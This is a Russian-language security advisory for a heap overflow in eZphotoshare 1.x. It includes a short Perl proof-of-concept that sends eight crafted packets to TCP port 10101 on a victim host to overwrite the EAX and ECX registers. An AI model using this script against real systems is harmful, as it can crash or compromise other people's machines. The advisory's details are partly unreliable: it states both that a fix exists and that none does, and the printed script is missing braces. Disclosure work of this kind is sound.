| Дата публикации: | 05.12.2003 | 
| Всего просмотров: | 1203 | 
| Опасность: | Средняя | 
| Наличие исправления: | Да | 
| Количество уязвимостей: | 1 | 
| CVE ID: | Нет данных | 
| Вектор эксплуатации: | Локальная сеть | 
| Воздействие: | Компрометация системы | 
| CWE ID: | Нет данных | 
| Наличие эксплоита: | Нет данных | 
| Уязвимые продукты: | eZphotoshare 1.x | 
| Уязвимые версии: eZphotoshare  
 Описание: Несколько переполнений буфера обнаружено в eZphotoshare. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь моежет послать специально обработанный 80 байтовый пакет к 10101 порту последовательно 8 раз, чтобы перезаписать ECX и EAX регистры и выполнить произвольный код с привилегиями текущего пользователя. Пример/Эксплоит: 
#!/usr/bin/perl -w
 
# Heap Corruption Vulnerability in eZphotoshare PoC
#  - by Peter Winter-Smith [peter4020@hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
 
print "Usage: eZpsheap.pl <victim>\n\n";
exit;
 
print "Heap Corruption PoC\n";
for($n=1;$n<9;$n++){
$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>"10101")
                            or die "Unable to connect to $ARGV[0] on port
10101";
$eax = "ABCD";
$ecx = "XXXX";
$packet = "GET /aaa" . $eax . $ecx . "a"x64;
print $victim $packet;
print " + Sending packet number $n of 8 ...\n";
sleep(1);
close($victim); }
print "Done.\n";
exit;
URL производителя: http://www.ezphotoshare.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.  | 
		|
| Ссылки: | eZphotoshare Multiple Overflow Vulnerabilities |